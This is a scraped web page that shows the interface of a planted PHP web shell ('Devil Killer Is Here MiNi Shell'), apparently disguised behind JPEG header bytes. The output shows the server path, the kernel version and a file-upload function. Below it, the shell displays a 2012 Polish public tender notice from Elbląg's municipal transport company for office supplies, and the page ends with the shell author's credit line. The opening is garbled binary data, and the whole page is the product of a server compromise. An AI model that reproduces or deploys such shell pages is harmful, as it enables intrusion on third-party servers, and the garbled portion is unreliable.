JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/15866-N-2012.html

<p class="kh_header"><b>Elbląg: Dostawa materiałów biurowych dla potrzeb Zarządu Komunikacji Miejskiej w Elblągu 
spółki z ograniczoną odpowiedzialnością</b><br>
<b>Numer ogłoszenia: 15866 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Komunikacji Miejskiej  w Elblągu Sp. z o.o. , ul. Browarna 90, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. (055) 230-79-00, faks (055) 234-79-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zkm.elblag.com.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zkm.elblag.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla potrzeb Zarządu Komunikacji Miejskiej w Elblągu 
spółki z ograniczoną odpowiedzialnością.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych .
Miejscem dostawy jest siedziba Zamawiającego - Zarząd Komunikacji Miejskiej w Elblągu spółka z ograniczoną odpowiedzialnością , 82-300 Elbląg ul. Browarna 90.
Przedmiot i zakres zamówienia obejmuje dostawę niżej wymienionych materiałów biurowych:

1.blok klasyczny  w kratkę z makulatury klejony na górze o formacie A4 - 80 kartek  - szt.4,

2. blok klasyczny w kratkę z makulatury klejony na górze o formacie A5 - 50 kartek  -szt. 5,

3.blok do flipchartów formatu A1 gładki o gramaturze 80g/m2, 1 blok zawiera 30 arkuszy -	szt.1,

4. cienkopis  końcówka oprawiona w metal, gr.linii pisania 0,4 mm, wentylowana skuwka, odporny na wysychanie. Tusz na bazie wody w kolorze czarnym -szt.45,

5.cienkopis  końcówka oprawiona w metal, gr.linii pisania 0,4 mm, wentylowana skuwka, odporny na wysychanie. Tusz na bazie wody w kolorze czerwonym - szt.40,

6. cienkopis  końcówka oprawiona w metal, gr.linii pisania 0,4 mm, wentylowana skuwka, odporny na wysychanie. Tusz na bazie wody w kolorze niebieskim - szt.16,

7. cienkopis  końcówka oprawiona w metal, gr.linii pisania 0,4 mm, wentylowana skuwka, odporny na wysychanie. Tusz na bazie wody w kolorze zielonym - szt.33,

8.dziennik podawczy do ewidencjonowania przychodzącej i wychodzącej korespondencji - twarda okładka z wytłoczonym napisem - dziennik korespondencyjny, format A4, 96 kart. - szt.4,

9. długopis z wkładem wymiennym typu Zenith, wkład piszacy w kolorze niebieskim -szt.37,

10.marker permanentny :  wodoodporny, posiada system  DRY SAFE dzięki któremu może on pozostawać bez skuwki do 14 dni i nie wyschnie, gr. linii pisania 2mm, okrągła końcówka , kolor czarny, zielony - szt.2,

11. folia do laminowania błyszcząca , zaokrąglone rogi, w formacie  A6 (111mmx154mm), o grubości 2 x 100 mikronów - op.6,

12. grafit do ołówka automatycznego - gęstość grafitowa 1,73g/cm3 , średnica końcówki 0,5mm  , długość 61 cm, długość linii pisania do 300 m, bezzapachowy, grafit polimerowy.W opakowaniu min. 12 pręcików grafitów HB - szt.5,

13. listwy (grzbiety) wsuwane do oprawy dokumentów w formacie A 4. Pojemność listwy do 30 kart, 80g/m2 , listwy w kolrze czarnym - szt.200,

14. listwy (grzbiety)  wsuwane do oprawy dokumentów w formacie A 4. Pojemność listwy do 60 kart, 80g/m2 , listwy w kolrze czarnym - szt.100,

15. bloczek samoprzylepny 76x76, substancja klejąca usuwalna za pomocą wody, karteczki w żółtym kolorze, ilość karteczek w bloczku: 100 - szt.37,

16. bloczek samoprzylepny 51x38, substancja klejąca usuwalna za pomocą wody, karteczki w żółtym kolorze, ilość karteczek w bloczku: 100 - szt.37,

17. klej w sztyfcie, produkowany na bazie PVP (poliwinylopyrolidonu), co zapobiega wysychaniu zamkniętego w sztyfcie kleju, nietoksyczny, bez rozpuszczalnika, z atestem PZH; kontrola dozowania przez regulację ruchomej podstawy sztyftu; użyty klej wysycha natychmiast nie powodując marszczenia papieru, 8 g - szt.70,

18. clips biurowy 19 mm op.12 szt. - op.20,

19. clips biurowy 25 mm op.12 szt. - op.20,

20. clips biurowy 32 mm op.12 szt. - op.5,

21. koperta  biała SK DL OP 110x220, a 1000szt./op - op.	10,

22. koperta  biała SK C 6 114x162 z paskiem a 1000szt./op - op.45,

23. koperta  biała SK C 5 (A5) 162x229 a 500szt./op - op.1,

24. koperta  biała SK C 4 (A4) 229x324 a 250szt./op - op.1,

25. koperta  biała SK B 4 (A4+) 250x353 a 250szt./op - op.1,

26. koperta  biała SK C 5 (A5) 162x229 a 250szt./op - op.2,

27. koperta  szara SK B 4 z paskiem klejącym 250x353 a 250szt./op - op.6,

28. koperta bezpieczna K70  rozmiar (160 x 250 ) do przesyłania wartości pieniężnych i dokumentów poufnych. Nie można ich otwierać bez pozostawienia śladów. Wykonane z trwałego, trójwarstwowego polietylenu , warstwa folii znajdująca się we wnętrzu koperty bezpiecznej jest czarna. Grubość folii powyżej 100 mikronów gwarantująca wysoką odporność na uszkodzenia mechaniczne. Posiadające system kuponów umożliwiających kontrolę poszczególnych etapów transportu. - szt.1450,

29. koperta bezpieczna B5 rozmiar (200x255)  do przesyłania wartości pieniężnych i dokumentów poufnych.    Nie można ich otwierać bez pozostawienia śladów. Wykonane z trwałego, trójwarstwowego polietylenu , warstwa folii znajdująca się we wnętrzu koperty bezpiecznej jest czarna. Grubość folii powyżej 100 mikronów gwarantująca wysoką odporność na uszkodzenia mechaniczne. Posiadające system kuponów umożliwiających kontrolę poszczególnych etapów transportu. - szt.	800,

30. korektor w płynie szybkoschnący na bazie rozpuszczalnika z gąbką korygującą , pojemność minimum 20 ml. - szt.17,

31. korektor szybkoschnący z cienką metalową końcówką zaworkową, pojemność minimum 12 ml. - szt.2,

32. koszulka A4 krystaliczna, otwierana z boku, antystatyczna folia. - szt.10,

33. koszulka A5 krystaliczna, otwierana u góry, antystatyczna folia, 100 szt./op. - op.1,

34. koszulka A4 krystaliczna, otwierana u góry, antystatyczna folia, 100 szt./op. - op.23,

35.karton archiwacyjny na zawartość segregatora do dokumentów A4 o wymiarach minimum 340mm x 260mm, wykonane ze sztywnego kartonu, posiadający miejsce na grzbiecie do opisu dokumentu - szt.100,

36. klip do akt,  plastikowy, o pojemności do 500 kartek, rozstaw otworów :80 mm - szt.150,

37. kalkulator typu  vector DK 209  12 pozyc. Duży wyświetlacz - szt.1,

38. linijka dł. 20 cm plastikowa przezroczysta - szt.1,

39. linijka dł. 100 cm plastikowa przezroczysta - szt.1,

40. wąsy do  skoroszytów - szt.20,

41. marker permanentny do opisywania płyt CD/DVD, szerokość linii pisania 0,8-1,0 mm, kolor czarny - szt.23,

42. ofertówka  A4 krystaliczna, sztywna, otwierane u góry i z prawej strony, wycięcie na palec ułatwia wyjmowanie i wkładanie dokumentów. Bezpieczne, z zaokrąglonymi narożnikami. Wykonane ze sztywnej folii PCV o grubości 150 mic. kolor zielony, niebieski - szt.10,

43. ołówek klasyczny drewniany o twardości HB z gumką - szt.15,

44. ołówek automatyczny - gumowana obudowa z antypoślizgowymi żłobieniami, gumka chroniona skuwką , plastykowym klipsem, metalowa końcówka z mechanizmem amortyzującym, system gwarantujący niemal 100% wykorzystanie grafitu, system amortyzujący zabezpieczający grafit przed złamaniem, grafit 0,5mm - szt.5,

45. okładki do oprawy dokumentów w formacie A4, wykonane z tektury imitującej skórę, o gramaturze 250 g/m2 , w kolorze bordo lub granat  100 szt./op. - op.2,

46. okładki przezroczyste krystaliczne  do oprawy dokumentów w formacie A4 , 100szt. /op. - op.2,

47. papier uniwersalny do wydruków czarno - białych i kolorowych, gramatura 80 g/m2, ryza - 500 arkuszy. , format A3 - ryz 2,

48. papier format A4, o gramaturze 250 g/m2, ryza -  250 arkuszy -ryz 14,

49. papier uniwersalny do wydruków czarno - białych i kolorowych,  gramatura 80 g/m2,  ryza - 500 arkuszy. , format A4 - ryz 402
50. papier komputerowy  składanka 1/1 (240x12 ) z nadrukiem oryginał/kopia	 - op.2,

51. papier komputerowy  składanka 1/0 (240x12 )  - op.4,

52. płyty czyste DVD -R , 4,7 GB, 10szt./op. - op.4,

53. pinezki biurowe - galwanizowane , srebrne (1 opakowanie -  50szt) -op.	3,

54. torebki jednorazowe, foliowe (śniadaniowe)150mmx200mm - 200 szt/op. w opakowaniu - op.15,

55. rolki do kas fiskalnych  białe o gramaturze 55g/m2 , rozmiar 56/30 - szt.1195,

56. rolka termiczna do bileterek 28x30 biała - szt.14000,

57. rozszywacz do zszywek - szt.1,

58. segregatory format A4, z mechanizmem dźwigniowym, wymienna etykieta na grzbiecie, wykonany z kartonu pokrytego PP, dwa okute otwory w przedniej okładce, wyklejka papierowa, szer. grzbietu 50 mm, wzmocnione krawędzie dolne, w kolorze zielonym lub niebieskim. - szt.12,

59. segregatory format A5, z mechanizmem dźwigniowym, wymienna etykieta na grzbiecie, wykonany z kartonu pokrytego PP, dwa okute otwory w przedniej okładce, wyklejka papierowa, szer. grzbietu 70 mm, wzmocnione krawędzie dolne, w kolorze zielonym lub niebieskim. - szt.6,

60. segregatory format A4, z mechanizmem dźwigniowym, wymienna etykieta na grzbiecie, wykonany z kartonu pokrytego PP, dwa okute otwory w przedniej okładce, wyklejka papierowa, szer. grzbietu 75 mm, wzmocnione krawędzie dolne, w kolorze zielonym lub niebieskim. - szt.90,

61. skoroszyt PCV - wpinany  format A4 z otworami pozwalającymi na wpięcie do segregatora, tylna okładka kolorowa, przednia przezroczysta, wysuwany papierowy pasek do opisu, okładki sztywne, wąs metalowy umożliwiający wpinanie dokumentów - szt.	60,

62. skoroszyt PCV - wpinany  format A4 , tylna okładka kolorowa, przednia przezroczysta, wysuwany papierowy pasek do opisu, okładki sztywne, wąs metalowy umożliwiający wpinanie dokumentów - szt.30,

63. skoroszyt kartonowy oczkowy 1/2, biały , gram. 400 g/m2 , z wąsem do wpinania dokumentów, z nadrukiem  linii do opisu - szt.120,

64. skoroszyt z klipsem zaciskowym format A4 - szt.4,

65. spinacz mały 33 mm owalny a 100, 10szt/op. - op.3,

66. spinacz duży70 mm , a 50, - op.2,

67. taśma klejąca przezroczysta o szer. 6 cm/50 mb z klejem kauczukowym - szt.13,

68. taśma uniwersalna klejąca szer. 24 mmx 33mm - szt.5,

69. taśma klejąca  przezroczysta  ( szpula 19 mm x 30 m ) - szt.28,

70. teczka do podpisu  A4 - twarda okładka z wytłoczonym  napisem ,wykonana z tektury imitującej skórę,  grzbiet harmonijkowy, kartonowe przekładki - 12 przekładek - szt.1,

71. teczka tekturowa wiązana format 320x220 - szt.10,

72. teczka z gumką kartonowa A4 , wykonana z kartonu o gramaturze 400g/m2, wewnętrzne skrzydła, okrągła pionowa gumka chroniąca zawartość przed wysunięciem, wymiary 232x317mm - szt.40,

73. tusz do pieczątek czarny - szt.8,

74. tusz do pieczątek niebieski - szt.2,

75. wkład do długopisu typu ZENITH,  o dużej pojemności,  w obudowie metalowej, kolor tuszu czarny - szt.11,

76. wkład do długopisu typu ZENITH, o dużej pojemności, w obudowie metalowej, kolor tuszu niebieski . - szt.35,

77. wkłady cienkie do długopisu niebieskie 11 cm - szt.10,

78. zakreślacz tekstu : szybkoschnący, spieralny z większości tkanin, z klipsem, skuwka typu twist ułatwia otwieranie, gwarantuje wyraźną widoczność zarówno zakreślenia jak i zakreślonego tekstu na kserokopiach, obudowa i skuwka wykonane z PP gwarantują długi okres użytkowania ,  fluorescencyjny, wyjątkowa gładka, ścięta końcówka, wkład piszący w kolorze żółtym - szt.20,

79. zakreślacz tekstu : szybkoschnący, spieralny z większości tkanin, z klipsem, skuwka typu twist ułatwia otwieranie, gwarantuje wyraźną widoczność zarówno zakreślenia jak i zakreślonego tekstu na kserokopiach, obudowa i skuwka wykonane z PP gwarantują długi okres użytkowania ,  fluorescencyjny, wyjątkowa gładka, ścięta końcówka, wkład piszący w kolorze różowym - szt.	5,

80. zakreślacz  tekstu : szybkoschnący, spieralny z większości tkanin, z klipsem, skuwka typu twist ułatwia otwieranie, gwarantuje wyraźną widoczność zarówno zakreślenia jak i zakreślonego tekstu na kserokopiach, obudowa i skuwka wykonane z PP gwarantują długi okres użytkowania ,  fluorescencyjny, wyjątkowa gładka, ścięta końcówka, wkład piszący w kolorze niebieskim. - szt.5,

81. zeszyt A5 w kratkę 96 kart. , okładka foliowana. - szt.7,

82. zeszyt A4 w kratkę 96 kart. , okładka foliowana. - szt.2,

83. zszywacz na zszywki 24/6, wykonany z metalu z plastikową oprawą, 
     zszywa do 15 kartek - szt.2,

84. zszywki 23/8 do zszywaczy , 1000 szt./op. - op.1,

85. zszywki biurowe 24/6  miedziane, a1000, 12szt./op. - op.5,

86. zszywki biurowe 24/6, stalowe a 1000, 10szt /op. - op.5,

87. zszywki AL. 10, a 1000szt. - szt.1,

88. zakładki samoprzylepne, przezroczyste do zaznaczania dokumentów - op.2

Zamawiający wymaga dostawy materiałów fabrycznie nowych,  w zamkniętych opakowaniach, bez wad, odpowiadającym co do jakości wymogom dla materiałów tego rodzaju dopuszczonym do obrotu.
Na dostarczone materiały Wykonawca udzieli 12 miesięcy gwarancji w terminie od dnia dostawy do siedziby Zamawiającego.
Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający  informuje, że nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zkm.elblag.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zkm.elblag.com.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zarządu Komunikacji Miejskiej w Elblągu 
spółka z ograniczoną odpowiedzialnością  82-300 Elbląg, ul. Browarnej 90, pok. Nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com